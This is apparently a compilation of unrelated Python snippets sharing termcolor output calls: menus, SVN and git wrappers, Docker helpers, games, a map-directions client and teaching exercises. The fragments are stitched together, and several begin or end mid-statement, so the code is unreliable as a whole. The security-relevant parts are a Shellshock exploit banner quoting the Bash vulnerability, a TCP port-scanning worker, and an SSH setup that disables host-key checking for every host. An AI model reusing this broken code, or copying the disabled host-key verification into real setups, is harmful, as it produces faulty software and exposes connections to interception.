def history():
    subprocess.call("clear")
    cprint("\nWork History:", 'green', attrs=['bold'])
    cprint("    You're looking at it. This is a project to highlight some of my abilities. I\n"
           "    also have more projects that can be seen on GitHub at\n"
           "    https://github.com/kinsei/", 'green')
    main_menu = raw_input(colored("\n\n\n\n\n\n\n\n\n\n\n\n\n\nWould you like to see more? (y/n):\n\n>>> ",
                                  'green', attrs=['bold']))
    # The original bare `cl` statements were no-ops; clear the screen explicitly
    # before switching menus instead.
    subprocess.call("clear")
    if main_menu.lower() in ("y", "yes"):
        more.more()
    else:
        main.menu()
def print_screen_log(name):
    head = "\n****----"
    tail = "----****"
    if name == 'initTestServices':
        text = head + "Initializing Traffic Generator" + tail
    elif name == 'create_private_sessionDir':
        text = head + "Setting up user session" + tail
    elif name == '__onboard__':
        text = head + 'Onboarding service Template' + tail
    elif name == 'register':
        text = head + 'Registering Event Framework' + tail
    elif name == '__create_service__':
        text = head + 'Triggering Service Creation' + tail
    elif name == 'deleteService':
        text = head + 'Cleanup - Deleting Service' + tail
    elif name == 'create_pdf':
        text = head + 'Reporting results' + tail
    elif name == 'deleteTemplate':
        text = head + "Deleting Service Template" + tail
    else:
        # Unknown step names are silently ignored.
        return
    cprint(text, 'green', on_color='on_blue', attrs=['bold'])
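# The elif ladder above is just a static name-to-message table; a minimal
# sketch of the same behavior as a dict lookup (the helper name is
# hypothetical, not from the original project):
SCREEN_LOG_MESSAGES = {
    'initTestServices': "Initializing Traffic Generator",
    'create_private_sessionDir': "Setting up user session",
    '__onboard__': "Onboarding service Template",
    'register': "Registering Event Framework",
    '__create_service__': "Triggering Service Creation",
    'deleteService': "Cleanup - Deleting Service",
    'create_pdf': "Reporting results",
    'deleteTemplate': "Deleting Service Template",
}

def print_screen_log_from_table(name):
    message = SCREEN_LOG_MESSAGES.get(name)
    if message is None:  # unknown step names stay silent, as in the original
        return
    cprint("\n****----" + message + "----****", 'green', on_color='on_blue', attrs=['bold'])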
def _make_context():
    """
    Return context dict for a shell session so one can access stuff without
    importing it explicitly.
    """
    context_dict = {'app': app, 'db': db, 'logsql': logsql, 'func': func}

    def print_name(name, desc):
        name = colored(name, 'blue', attrs=['bold'])
        print('  {:15s} - {}'.format(name, desc))

    cprint('Names already imported to the shell (by `_make_context`):', 'yellow', attrs=['bold'])
    print_name('app', 'Flask application')
    print_name('db', 'flask.sqlalchemy database object')
    print_name('func', 'sqlalchemy.func')
    print_name('logsql', 'utility function to enable/disable logging of SQLAlchemy SQL queries')

    # Imports models from specified modules
    from application import models
    cprint('Models:', 'yellow', attrs=['bold'])
    for attr_name in dir(models):
        attr = getattr(models, attr_name)
        if inspect.isclass(attr) and issubclass(attr, db.Model):
            context_dict[attr.__name__] = attr
            print_name(
                attr.__name__,
                'imported from ' + colored(models.__name__ + '.' + attr.__name__, 'green')
            )
    return context_dict
def svn_command(subcommand, *args):
    command = ['svn', '--non-interactive']
    # if not local_cache:
    #     command.append('--no-auth-cache')
    command.append('--no-auth-cache')
    if trust_cert:
        command.append('--trust-server-cert')
    command.append(subcommand)
    if not verbose and subcommand not in ('info', 'cleanup'):
        command.append('-q')
    command.extend(args)
    if verbose:
        if '--username' in command or '--password' in command:
            filtered_command = []
            for i in range(len(command)):
                # remove username and password from logging
                user_pass = ('--username', '--password')
                if command[i] in user_pass or \
                        (i > 0 and command[i - 1] in user_pass):
                    continue
                filtered_command.append(command[i])
            cprint('>>> ' + ' '.join(filtered_command), 'cyan')
        else:
            cprint('>>> ' + ' '.join(command), 'cyan')
    if subprocess.call(command) != 0:
        raise SVNError(subcommand)
def linecount(self):
    count = 0
    for _ in self.file:  # enumerate() added nothing here; only the count matters
        count += 1
        message = 'Counting ' + str(count)
        cprint('\r%s' % message, 'green', end='')
    return count
def display(filter_items=None, extra=None):
    """
    Display all diary entries and info as a table on the screen.
    :param filter_items: List which specifies items to be displayed. Will default to all entries.
    :param extra: Extra text to be displayed after the table.
    :return: None.
    """
    filter_mode = filter_items is not None
    items = filter_items if filter_mode else diary.entries
    os.system('cls' if os.name == 'nt' else 'clear')  # For Windows/Mac/Linux compatibility
    if not items:
        message = 'No entries match these criteria\n' if filter_mode else 'Diary has no entries\n'
        cprint(message, 'yellow')
        if extra is not None:
            print(extra + '\n')
        return
    table = create_table(items, filter_mode)
    # Get current terminal height so it is not changed. This allows proper
    # functioning when in full screen mode on mac.
    rows = os.popen('stty size', 'r').read().split()[0]
    sys.stdout.write("\x1b[8;{rows};{cols}t".format(
        rows=rows, cols=max(len(table.split('\n')[1]), 80)))  # Resize window
    print(table + '\n')  # Newline after table is more aesthetically pleasing.
    if extra is not None:
        print(extra + '\n')
def print_path(url):
    resp = requests.get(url)
    respjson = simplejson.loads(resp.text)
    checkresp(respjson, resp)
    keypoints = respjson['routes'][0]['legs'][0]
    print "From: " + keypoints['start_address']
    print "To: " + keypoints['end_address']
    print "Distance: " + keypoints['distance']['text']
    print "Duration: " + keypoints['duration']['text']
    printwarnings(respjson)
    if 'mode=transit' in url:
        print keypoints['departure_time']['text'] + ' to ' + keypoints['arrival_time']['text']
    steps, linenum = keypoints['steps'], 1
    for step in steps:
        instruction = sanitize(step['html_instructions'])
        # fix for formatting issue on last line of instructions
        instruction = re.sub('Destination', '. Destination', instruction)
        sys.stdout.write(str(linenum) + '. ' + instruction + ': ')
        cprint(step['duration']['text'], 'green')
        linenum += 1
def extract_proxy_data(doc, namespace_spec_url):
    """Extracts the data from an already parsed (also use deepcopy) XML doc.
    Returns a list of dictionaries of five strings containing the 'ip',
    'port', 'country', 'timestamp', and 'whois'."""
    namespaces = {'prx': namespace_spec_url}
    proxies = []
    try:
        for i in doc.iterfind('channel/item/prx:proxy', namespaces):
            ip = i.find('prx:ip', namespaces)
            port = i.find('prx:port', namespaces)
            timestamp = i.find('prx:check_timestamp', namespaces)
            if timestamp is None:  # make fault tolerant
                timestamp = copy(ip)
                timestamp.text = 'Unknown'
            country = i.find('prx:country', namespaces)
            if country is None:
                country = i.find('prx:country_code', namespaces)
            if country is None:
                country = copy(ip)
                country.text = 'Unknown'
            proxy = {'ip': ip.text, 'port': port.text, 'country': country.text,
                     'timestamp': timestamp.text, 'whois': 'Unknown'}
            proxies.append(proxy)
    except Exception as e:
        cprint('[-] Error processing XML feed %s!' % doc, 'red')
        cprint('[-] Error: %s' % e, 'yellow')
        quit()
    return proxies
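# A minimal usage sketch for extract_proxy_data, assuming an RSS-style feed;
# the namespace URL and the XML payload below are illustrative only:
import xml.etree.ElementTree as ET

SAMPLE_FEED = """<rss xmlns:prx="http://example.com/proxy-ns">
  <channel>
    <item>
      <prx:proxy>
        <prx:ip>10.0.0.1</prx:ip>
        <prx:port>8080</prx:port>
        <prx:country>Example</prx:country>
        <prx:check_timestamp>2020-01-01</prx:check_timestamp>
      </prx:proxy>
    </item>
  </channel>
</rss>"""

doc = ET.fromstring(SAMPLE_FEED)
for proxy in extract_proxy_data(doc, "http://example.com/proxy-ns"):
    print(proxy['ip'], proxy['port'], proxy['country'], proxy['timestamp'])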
def _run_action(args):
    defaulted_components = False
    components = settings.parse_components(args.pop("components"))
    if not components:
        defaulted_components = True
        components = _get_def_components()
    action = _clean_action(args.pop("action"))
    if not action:
        cprint("No valid action specified!", "red")
        return False
    rootdir = args.pop("dir")
    if rootdir is None:
        cprint("No root directory specified!", "red")
        return False
    # ensure os/distro is known
    (distro, platform) = utils.determine_distro()
    if distro is None:
        print("Unsupported platform " + colored(platform, "red") + "!")
        return False
    # start it
    (rep, maxlen) = utils.welcome(_WELCOME_MAP.get(action))
    header = utils.center_text("Action Runner", rep, maxlen)
    print(header)
    # need to figure out dependencies for components (if any)
    ignore_deps = args.pop('ignore_deps', False)
    if not defaulted_components:
        LOG.info("Activating components [%s]" % (", ".join(sorted(components.keys()))))
    else:
        LOG.info("Activating default components [%s]" % (", ".join(sorted(components.keys()))))
    if not ignore_deps:
        new_components = settings.resolve_dependencies(components.keys())
        component_diff = new_components.difference(components.keys())
        if component_diff:
            LOG.info("Having to activate dependent components: [%s]" % (", ".join(sorted(component_diff))))
            for new_component in component_diff:
                components[new_component] = list()
    component_skips = _check_roots(action, rootdir, components.keys())
    for c in component_skips:
        components.pop(c)
    if not components:
        LOG.error("After checking the various components roots, no components ended up being specified!")
        return False
    # get the right component order (by priority)
    component_order = settings.prioritize_components(components.keys())
    if action in _REVERSE_ACTIONS:
        # reverse them so that we stop in the reverse order
        # and that we uninstall in the reverse order which seems to make sense
        component_order.reverse()
    # add in any that will just be referenced but which will not actually do
    # anything (ie the action will not be applied to these)
    ref_components = settings.parse_components(args.pop("ref_components"))
    for c in ref_components.keys():
        if c not in components:
            components[c] = ref_components.get(c)
    # now do it!
    LOG.info("Starting action [%s] on %s for distro [%s]" % (action, date.rcf8222date(), distro))
    results = _run_components(action, component_order, components, distro, rootdir, args)
    LOG.info("Finished action [%s] on %s" % (action, date.rcf8222date()))
    if results:
        LOG.info('Check [%s] for traces of what happened.' % ", ".join(results))
    return True
def banner():
    # (A large figlet-style ASCII-art banner was printed here in red; its
    # block glyphs spell "SHELLSHOCK", but the art's spacing did not survive
    # reformatting and is omitted.)
    cprint('[+] - Author: Matheus Bernardes', 'red')
    cprint('[+] - Nick: G4mbler', 'red')
    cprint('[+] - Vulnerability Description', 'red')
    cprint('''
    GNU Bash through 4.3 processes trailing strings after function definitions in the values of
    environment variables, which allows remote attackers to execute arbitrary code via a crafted
    environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the
    mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP
    clients, and other situations in which setting the environment occurs across a privilege boundary
    from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect;
    CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the
    incorrect fix.
    ''', 'red')
def fix(self):
    """clowder fix command"""
    if self.clowder_repo is not None:
        cprint('Fix...\n', 'yellow')
        self.clowder.fix_version(self.args.version)
    else:
        exit_clowder_not_found()
def git_create_repo(url, repo_path, remote, ref, depth=0):
    """Clone git repo from url at path"""
    if not os.path.isdir(os.path.join(repo_path, '.git')):
        if not os.path.isdir(repo_path):
            os.makedirs(repo_path)
        repo_path_output = colored(repo_path, 'cyan')
        try:
            print(' - Clone repo at ' + repo_path_output)
            Repo.init(repo_path)
        except:
            cprint(' - Failed to initialize repository', 'red')
            print('')
            shutil.rmtree(repo_path)
            sys.exit(1)
        else:
            repo = _repo(repo_path)
            remote_names = [r.name for r in repo.remotes]
            remote_output = colored(remote, 'yellow')
            if remote not in remote_names:
                try:
                    print(" - Create remote " + remote_output)
                    repo.create_remote(remote, url)
                except:
                    message = colored(" - Failed to create remote ", 'red')
                    print(message + remote_output)
                    print('')
                    shutil.rmtree(repo_path)
                    sys.exit(1)
            _checkout_ref(repo_path, ref, remote, depth)
def moveEpisodeDir(self, dname, possibleShowName):
    source = os.path.join(self.SortConfig.TvDir, dname)
    target = os.path.join(self.SortConfig.TvDir, possibleShowName)
    shutil.move(source, target)
    cprint('Moved ' + dname + ' to ' + target, 'red')
    self.fixSymlink(dname, target)
def respondToHandshake(self, NodeId, ListeningPort, ProtocolVersion):
    ip = self.transport.getPeer().host
    d = Mercury.checkIfNodeExists(NodeId)

    def processNode(nodeExists):
        if nodeExists:
            return Mercury.updateAndGetNode(NodeId, ip, ListeningPort)  # This returns deferred
        else:
            return Mercury.createNode(NodeId, ip, ListeningPort)

    d.addCallback(processNode)

    def callReverseSync(node):
        # I'm going to ask for nodes in parallel with already existing header call.
        d = self.requestHeaders(node)
        d.addCallback(self.requestNodes)
        return node

    d.addCallback(callReverseSync)\
        .addErrback(self.closeConnection, 'INBOUND', callReverseSync.__name__)
    d.addCallback(self.setGlobalConnectedNode)  # This is at one level up, directly below protocol class.
    reply = {'NodeId': self.factory.localNodeId,
             'ListeningPort': aetherListeningPort,
             'ProtocolVersion': protocolVersion}
    cprint('FROM REMOTE: HANDSHAKE REQUEST: from %s:%s' % (ip, ListeningPort),
           'white', 'on_yellow', attrs=['bold'])
    cprint('ANSWER: %s' % (reply), 'white', 'on_yellow')
    print('\n')
    return reply
def validate_users(self):
    self.app.log.debug('Validating GitHub account names.')
    # validate required config parameters
    if not self.app.config.get('github', 'auth_token') or not self.app.config.get('github', 'auth_id'):
        raise error.ConfigError("Missing config parameter 'github.auth_id' and/or 'github.auth_token'! "
                                "Please run 'scrum-tools github authorize' first! ")
    key_username = self.app.config.get('core', 'users_schema_key_username')
    key_github = self.app.config.get('core', 'users_schema_key_github')
    user_repository = data.UserRepository(self.app.config)
    gh = login(token=self.app.config.get('github', 'auth_token'))
    for u in user_repository.users():
        if not u[key_github]:
            cprint("Skipping empty GitHub account for user '%s'." % u[key_username], 'yellow', file=sys.stdout)
            continue
        print colored("Validating GitHub account '%s' for user '%s'..." % (u[key_github], u[key_username]), 'green'),
        try:
            if gh.user(u[key_github]):
                print colored('OK', 'green', attrs=['bold'])
            else:
                raise RuntimeError("Github user '%s' not found" % u[key_github])
        except RuntimeError:
            print colored('Not OK', 'red', attrs=['bold'])
def scenario_rundown(scenario):
    steps = world.scenarios[scenario.name]
    for step in steps:
        if step in world.untried_steps or step in world.failed_steps:
            cprint(u'\u2503' + " ", 'cyan', attrs=['bold'])
            print ""
            cprint(u'\u2503' + " ", 'cyan', attrs=['bold'], end="")
            cprint("    -SCENARIO-FAILED: " + str(scenario.name), 'red')
            step_stepper(steps)
            # for step in steps:
            #     if step.failed:
            #         cprint("        " + str(step.described_at.line) + "**" + str(step.sentence), 'red')
            #         world.focus = True
            #     elif step.passed:
            #         cprint("        " + str(step.described_at.line) + "  " + str(step.sentence), 'green')
            #     else:
            #         cprint("        " + str(step.described_at.line) + "**" + str(step.sentence), 'yellow')
            #         world.focus = True
            # print ""
            return
        else:
            # step_stepper(steps)
            pass
    if not world.focus:
        cprint(u'\u2503' + " ", 'cyan', attrs=['bold'], end="")
        cprint("    -SCENARIO-PASSED: " + str(scenario.name), 'green')
def initiateHandshake(self):
    cprint('ASKING FOR: HANDSHAKE to %s:%s' % (self.transport.getPeer().host, self.transport.getPeer().port),
           'cyan', 'on_blue', attrs=['bold'])

    def replyArrived(reply):
        cprint('RECEIVED: HANDSHAKE REPLY. \n%s' % (reply), 'cyan', 'on_blue')
        print('\n')
        ip = self.transport.getPeer().host
        d = Mercury.checkIfNodeExists(reply['NodeId'])

        def processNode(nodeExists):
            if nodeExists:
                return Mercury.updateAndGetNode(reply['NodeId'], ip, reply['ListeningPort'])  # This returns deferred
            else:
                return Mercury.createNode(reply['NodeId'], ip, reply['ListeningPort'])

        d.addCallback(processNode)
        d.addCallback(self.setGlobalConnectedNode)  # This is at one level up, directly below protocol class.
        d.addCallback(self.requestHeaders)
        d.addCallback(self.requestNodes)

    self.callRemote(networkAPI.Handshake, NodeId=self.factory.localNodeId,
                    ListeningPort=aetherListeningPort, ProtocolVersion=protocolVersion)\
        .addCallback(replyArrived)\
        .addErrback(self.closeConnection, 'OUTBOUND', self.initiateHandshake.__name__)
def success(cls, message):
    """Prints the specified message with green text as well as to a file.

    Args:
        message: A str representing the message to log.
    """
    cprint(message, 'green')
def check_env(self, verbose=True):
    def exit_if(condition, msg):
        if condition:
            print(colored(msg, "red"))
            sys.exit(1)

    if verbose:
        cprint("Config settings: ", "yellow")
        if not self.isfile("uberdoc.cfg"):
            print("No project specific config file. Using defaults.")
        self.conf.show()
        print("Document version: " + self.version())
    exit_if(
        not distutils.spawn.find_executable(self.conf["pandoc_cmd"]),
        "Error: Couldn't find pandoc in current path.")
    exit_if(
        not distutils.spawn.find_executable("git"),
        "Error: Couldn't find git in current path.")
    exit_if(
        not path.isdir(self.in_dir),
        "Error: Couldn't find input folder. Was expecting folder: " + self.in_dir)
    toc_file_path = self.prefix_path(self.conf["in_dir"], self.conf["toc_filename"])
    exit_if(
        not path.isfile(toc_file_path),
        "Error: Couldn't find toc file. Was expecting: " + toc_file_path)
    if verbose:
        cprint("Environment setup ok.", "green")
def importScoresByNames(self, scores, assessmentId=0, exactGradesourceNames=False):
    if assessmentId == 0:
        assessmentId = self.chooseAssessment()
    GsNameToStudentId, postData = self.parseScoresForm(assessmentId)
    utils.check("Gradesource name -> studentId: ", GsNameToStudentId)
    errors = False
    if not exactGradesourceNames:
        ExtNameToGsName = self.matchNames(scores.keys(), GsNameToStudentId.keys())
        for extName, GsName in ExtNameToGsName.items():
            postData[GsNameToStudentId[GsName]] = scores[extName]
    else:
        for GsName, score in scores.items():
            if GsName in GsNameToStudentId:
                postData[GsNameToStudentId[GsName]] = score
            else:
                cprint('Missing name: ' + GsName, 'white', 'on_red')
                errors = True
        if errors:
            sys.exit()
    utils.check("Data to post: ", postData)
    self.postScores(postData)
    cprint("Go to %s" % (self.assessmentUrl % assessmentId), 'yellow')
def warn(cls, message):
    """Prints the specified message with red text as well as to a file.

    Args:
        message: A str representing the message to warn the user with.
    """
    cprint(message, 'red')
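# The success/warn loggers above promise "as well as to a file", but only the
# colored console half appears in these snippets; a minimal sketch of what the
# missing file half might look like (the log path is hypothetical):
def log_to_file(message, log_path="app.log"):
    # Append the uncolored message so the log file stays grep-friendly.
    with open(log_path, "a") as fh:
        fh.write(message + "\n")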
def configure(self, data):
    try:
        def keys(data):
            call(['touch', data['home_dir'] + '/.ssh/authorized_keys'])
            call(['chmod', '600', data['home_dir'] + '/.ssh/authorized_keys'])
            call(['touch', data['home_dir'] + '/.ssh/id_rsa'])
            call(['chmod', '400', data['home_dir'] + '/.ssh/id_rsa'])

        def permission(data):
            call(['chmod', '-R', '700', data['home_dir'] + '/.ssh'])

        def ownership(data):
            call(['chown', '-R', data['name'] + ':' + data['name'], data['home_dir'] + '/.ssh'])

        def settings(data):
            call(['touch', data['home_dir'] + '/.ssh/config'])
            config_path = data['home_dir'] + '/.ssh/config'
            if os.path.isfile(config_path):
                config_file = open(config_path, 'wt')
                config_file.write('Host *\n\tStrictHostKeyChecking no\n')
                config_file.close()

        ssh_dir = call(['mkdir', data['home_dir'] + '/.ssh'])
        if ssh_dir != 0:
            # the original bare `raise` aborted into the handler below; raise
            # a real exception instead
            raise OSError('could not create ' + data['home_dir'] + '/.ssh')
        permission(data)
        keys(data)
        settings(data)
        ownership(data)
    except Exception:
        self.remove(data)
        cprint('Error configuring Identity.', 'red')
        sys.exit(1)
def wiki_geosearch(option, opt_str, value, parser):
    """
    used to find out what happened at a certain location or in the range of radius
    """
    length = len(parser.rargs)
    global geosearch_res
    [latitude, longtitude, radius] = [0] * 3
    if length < 2:
        parser.error(colored("option -g needs at least 2 arguments!", "red", attrs=["bold"]))
    elif length > 3:
        parser.error(colored("option -g can't handle more than 3 arguments!", "red", attrs=["bold"]))
    elif length == 2:
        [latitude, longtitude] = parser.rargs[:]
    else:
        [latitude, longtitude, radius] = parser.rargs[:]
    try:
        geosearch_res = geosearch(latitude, longtitude, radius=radius)
    except WikipediaException:
        parser.error(
            colored(
                "An unknown error occurred: 'Invalid coordinate provided'. Please report it on GitHub!",
                "red",
                attrs=["bold"],
            )
        )
        exit(1)
    for res in geosearch_res:
        cprint(res + "\n", "green")
def affiche_grille(grille, largeur, longueur):
    global printed_pause
    global pause
    ### Move the cursor back to the top and display the score ###
    cprint("\033[;H Score: {}      ".format(score.value), 'white', 'on_cyan', ['bold'])
    # "\033[;H" moves the cursor back to the top because the "clear" command is
    # too slow => overwrite in place instead
    ### Display the grid ###
    border = colored('+', 'yellow', 'on_yellow')
    print(border * (longueur * 2 + 4))
    for i in range(largeur):
        print(border * 2, end="")
        for j in range(longueur):
            print(grille[i][j], end=grille[i][j])
        print(border * 2)
    print(border * (longueur * 2 + 4))
    ## If the game is over or paused
    if game_over.value == True:
        print("Game Over")
        print("Réessayez ?[o/n]\n")
    if pause.value == True and printed_pause.value == False:
        print("Paused")
        printed_pause.value = True
    else:
        print("      ")  ### To hide the word "Paused" => overwrite
def PrintMainUI():
    text = colored("Task List", "grey", "on_white")
    print ">" * 10 + text + "<" * 10
    print "\n1. Settings"
    print "2. Data Management"
    print "3. Machine Control"
    cprint("4. Quit\n", "magenta")
def help_print(self):
    """Display the docstrings for all commands"""
    for name, func in self.commands.items():
        termcolor.cprint(name, attrs=['bold'])
        print("    " + func.__doc__ + '\n')
    self.titlebar = "Showing documentation"
    return len(self.commands) * 3
def _TCP_multiple(self):
    try:
        mysock = create_tcp_socket(self.to, 'conn')
        try:
            with self.lock:
                self.c += 1
            d = mysock.connect_ex((self.tgt, self.port))
            if d == 0:
                with self.lock:
                    self.c += 1
                serv = getportserv(self.port)
                if self.quite == True:
                    data = (str(self.port), 'open', serv)
                    p.put(data)
                else:
                    print str(self.port).ljust(7) + 'open'.ljust(7) + serv
        except KeyboardInterrupt:
            sys.exit(cprint('[-] Canceled by user', 'red'))
        finally:
            pass
    except KeyboardInterrupt:
        sys.exit(cprint('[-] Canceled by user', 'red'))
    except:
        pass
    finally:
        pass
def test_stop(stop_name):
    """Run a series of tests on the command-line for the given stop name."""
    # Make sure we don't have more than one consecutive blank in the stop name.
    stop_name = re.sub(" +", " ", stop_name)
    # Use ' ' in strings below to allow single blanks in stop names.
    examples = """
        --help
        --stop %(stop_name)s
        --stop %(stop_name)s --header
        --stop %(stop_name)s --tablefmt rst
        --stop %(stop_name)s --num-line-groups 2
        --stop %(stop_name)s --num-line-groups 2 --filter-line U
    """ % {"stop_name": stop_name.encode("utf-8")}
    # --stop Bahnhof --header --filter-name "(Potsdam)"  # fails
    examples = examples.strip().split("\n")
    for example in examples:
        prog = join(os.getcwd(), sys.argv[0])
        cmd = "%s %s %s" % (sys.executable, prog, example.strip())
        termcolor.cprint(cmd, attrs=["bold"])
        ## todo:
        print("")
        subprocess.check_call(cmd.decode("utf-8").split(" "))
        print("")
def make_url(parser, options, args, printInfo=True):
    checkinput(options)
    url_end = ''
    for key, value in options.__dict__.items():
        if value is not None:
            if key in ["departure_time", "arrival_time"]:
                try:
                    value = int(value)
                except ValueError as e:
                    value = int(mktime(cal.parse(value)[0]))
                finally:
                    time = value
                value = str(value)
            if not (isinstance(value, bool) or isinstance(value, int)):
                value = re.sub(' ', '+', value)  # re.sub returns the new string; the original discarded it
                url_end += key + '=' + value + '&'
    origin = re.sub(' ', '+', args[1])
    destination = re.sub(' ', '+', args[2])
    if not options.nourl:
        cprint(_("To view these directions online, follow this link: ") +
               "http://mapof.it/" + origin + '/' + destination, 'cyan')
    base_url = ('http://maps.googleapis.com/maps/api/directions/json?origin=' +
                origin + '&destination=' + destination + '&')
    url = (base_url + url_end)[:-1]
    while True:
        val = print_path(url, printInfo, options.mode, int(options.width))
        if val > 0:
            return val
def display_cell(cell, agents):
    # display height
    if cell['color'] is not NONE_COLOR:
        if cell['h'] < 0:
            cprint('%d\t\t' % cell['h'], cell['color'], end='')
        if cell['h'] == 0:
            cprint(' %d\t\t' % cell['h'], cell['color'], end='')
        return
    if cell['h'] < 0:
        # hole
        print('%d' % cell['h']),
    elif cell['h'] == 0:
        # tile
        print(' %d' % cell['h']),
    else:
        # obstacle
        print(' #'),
    # display tiles
    if cell['tiles']:
        for tile in cell['tiles']:
            cprint('*', tile, end='')
    # display agent
    for agent in agents:
        if agent.x == cell['x'] and agent.y == cell['y']:
            cprint(',%d$' % agent.points, agent.color, end='')
            if agent.carry_tile:
                cprint('* ', agent.carry_tile, end='')
    print('\t\t'),
def docker_copy_file_out(self, src, dest):
    cprint("[" + self.hostname + "][Docker]: copy file from docker " + src +
           " --> " + dest + ".", self.__output_color)
    self.run(['sudo'] + self.__docker.copy_file_out(src, dest))
"closed": "red", "merged": "purple", "declined": "blue" } organization_name = "pagarme" repository_name = "pagarme-core" repository_path = f"{organization_name}/{repository_name}" issue_number_list = [655, 599, 597, 488, 939] # strip colors if stdout is redirected init(strip=not sys.stdout.isatty()) text = "Issues" cprint(figlet_format(text, font='banner3'), 'green', 'on_blue', attrs=['bold']) access_info = opsutils.load_access_information(look_at="home") github_token = access_info["github"]["token"] access_info = opsutils.load_access_information(look_at="home") slack_token = access_info["slack"]["token"] Slack = opsutils.Slack(slack_token) channel_name = "ops-issues" filename = "last_update.csv" ##################### # MAIN # #####################
# file_name = input(colored('Enter the file name: ', color='magenta'))
# cprint('Argentina', color='cyan')

f_users = open('resources/e1_users - users.csv')
f_users.readline()  # skip the first line, which holds the table metadata

countries = set()
# for line in f_users.readlines():
#     countries.add(line.split(',')[6].strip())
# solve it with a comprehension (i.e. "replace" the loop with the [] construct)
[countries.add(line.split(',')[6].strip()) for line in f_users.readlines()]
f_users.close()

# for country in countries:
#     index = random.randrange(0, len(colours))
#     cprint(country, color=colours[index])
# sample solution using a comprehension
[cprint(country, color=choice(colours)) for country in countries]

'''
Documentation: https://pypi.org/project/termcolor/

Usage examples: https://www.programcreek.com/python/example/78943/termcolor.colored

To install this library, run the following command in the console:
pip install termcolor

Or do it through the PyCharm settings: https://clck.ru/Ngn8D
'''
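# Side note (a sketch, not part of the original exercise): a comprehension used
# only for its side effects builds a throwaway list of None values; a plain
# loop expresses the same idea more idiomatically:
for country in countries:
    cprint(country, color=choice(colours))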
def search(rooms, courses, course_names, students, matrix):
    """ Searches for painpoints in the case. """
    student_numbers = [student.student_number for student in students]
    student_weakness = [0 for number in student_numbers]
    course_weakness = [0 for coursename in course_names]

    for i in range(100):
        # schedule
        day_sch.total_schedule(rooms, courses, course_names, matrix)

        # calculate score and apply hillclimber
        score = sc.matrix_checker(courses, course_names, matrix) + sc.order_checker(courses)
        score += sc.student_checker(rooms, courses, course_names)
        bonus, malus = sc.distribution_checker(courses)
        score += bonus + malus
        score += sc.evening_checker(rooms, courses, course_names)
        score = hill.random_climber(courses, rooms, course_names, 1000, score, matrix)

        # schedule students
        stu.distribute_all_students(students, rooms, courses, course_names)

        # save score for hillclimber
        student_bonus, student_malus = sc.student_score(students)
        student_score = student_bonus + student_malus

        # pre filter the relevant courses
        student_courses = []
        for course in courses:
            poss_group_ids = []
            for activity in course.activities:
                if activity.group_id not in poss_group_ids and activity.group_id != "x":
                    poss_group_ids.append(activity.group_id)
            if len(poss_group_ids) > 1:
                student_courses.append([course, poss_group_ids])

        # student hillclimber
        student_climb_score = sthl.students_hillclimber(
            student_courses, students, student_score, 100)

        # update statistics
        for course in courses:
            if course.goodbad < 0:
                course_weakness[course_names.index(course.name)] += 1
        for student in students:
            if student.goodbad < -12:
                student_weakness[student_numbers.index(student.student_number)] += 1

        bas_sch.print_schedule(rooms)
        bas_sch.clear_schedule(rooms, courses)
        bas_sch.clear_students(students)
        cprint(i, "blue")

    # print painpoints
    for f in range(len(student_numbers)):
        print(student_numbers[f] + ":", student_weakness[f])
    for j in range(len(course_names)):
        print(course_names[j] + ":", course_weakness[j])
) cprint("successful", "green") except urllib.error.HTTPError: cprint("failed", "yellow") download_errors.append(i + 1) continue cprint("download complete", "blue") cprint(f"successful: {len(results) - len(download_errors)} images", "blue") if download_errors: cprint(f"failed: {len(download_errors)} images", "yellow") if __name__ == "__main__": cprint("-" * 50, "magenta") cprint((f"Image Collector v{__version__}").center(50), "magenta") cprint("-" * 50, "magenta") parser = argparse.ArgumentParser( argument_default=argparse.SUPPRESS, description=f"Image Collector v{__version__}", ) parser.add_argument("-t", "--target", help="target name", type=str, required=True) parser.add_argument("-n", "--number", help="number of images",
def install_python_interpreter(self):
    """
    Install the base python interpreter. This needs to be created before
    the virtualenv can be created.
    """
    cprint("Checking for base python interpreter", "yellow")
    sp.check_call("pyenv install -s " + self.runtime.version, shell=True)
import json
import termcolor
from pathlib import Path

# -- Read the json file
jsonstring = Path("person_3.json").read_text()

# Create the object person from the json string
person = json.loads(jsonstring)

# Person is now a dictionary. We can read the values
# associated to the fields 'Firstname', 'Lastname' and 'age'

# Print the information on the console, in colors
print()
termcolor.cprint("Name: ", 'green', end="")
print(person['Firstname'], person['Lastname'])
termcolor.cprint("Age: ", 'green', end="")
print(person['age'])

# Get the phoneNumber list
phoneNumbers = person['phoneNumber']

# Print the number of elements in the list
termcolor.cprint("Phone numbers: ", 'green', end='')
print(len(phoneNumbers))

# Print all the numbers
for i, num in enumerate(phoneNumbers):
    termcolor.cprint("  Phone {}:".format(i), 'blue')
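# The walkthrough above assumes person_3.json has roughly this shape; an
# illustrative (hypothetical) file that satisfies it:
# {
#     "Firstname": "Ada",
#     "Lastname": "Lovelace",
#     "age": 36,
#     "phoneNumber": [
#         {"type": "home", "number": "555-0100"},
#         {"type": "work", "number": "555-0101"}
#     ]
# }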
def start_docker(self, exec_cmd):
    cprint("[" + self.hostname + "]: start docker container.", self.__output_color)
    self.run(['sudo'] + self.__docker.start_docker(exec_cmd))
def set_hostname(self):
    cprint("[" + self.hostname + "]: set hostname.", self.__output_color)
    # "sudo hostname" as a single token would not exec correctly as an argv list
    cmd = ["sudo", "hostname", self.hostname]
    self.run(cmd)
def docker_copy_file(self, src, dest):
    cprint("[" + self.hostname + "][Docker]: copy file to docker " + src +
           " --> " + dest + ".", self.__output_color)
    self.run(['sudo'] + self.__docker.copy_file(src, dest))
    self.run(['sudo'] + self.__docker.update_file_ownership(dest))
        errorString = [
            self.outString + " ",
            f"Was not able to access '{self.sl}'"
        ]
        if last:
            fileString = self.outString + "│   └─ "
        else:
            fileString = self.outString + "│   ├─ "
        if not self.outFile:
            if (type == "dir"):
                cprint(string, "blue")
            elif (type == "file"):
                cprint(colored(fileString, "blue") + colored(string, "green"))
            else:
                cprint(colored(errorString[0], "blue") + colored(errorString[1], "red"))
        else:
            if (type == "dir"):
                self.outFile.write(string + "\n")
            elif (type == "file"):
                self.outFile.write(fileString + string + "\n")
            else:
                self.outFile.write(errorString[0] + errorString[1] + "\n")


if __name__ == "__main__":
    root = direc(os.getcwd(), 0)
    cprint(root, "yellow")
    root.searchDir()
def get_docker_img(self, nodes):
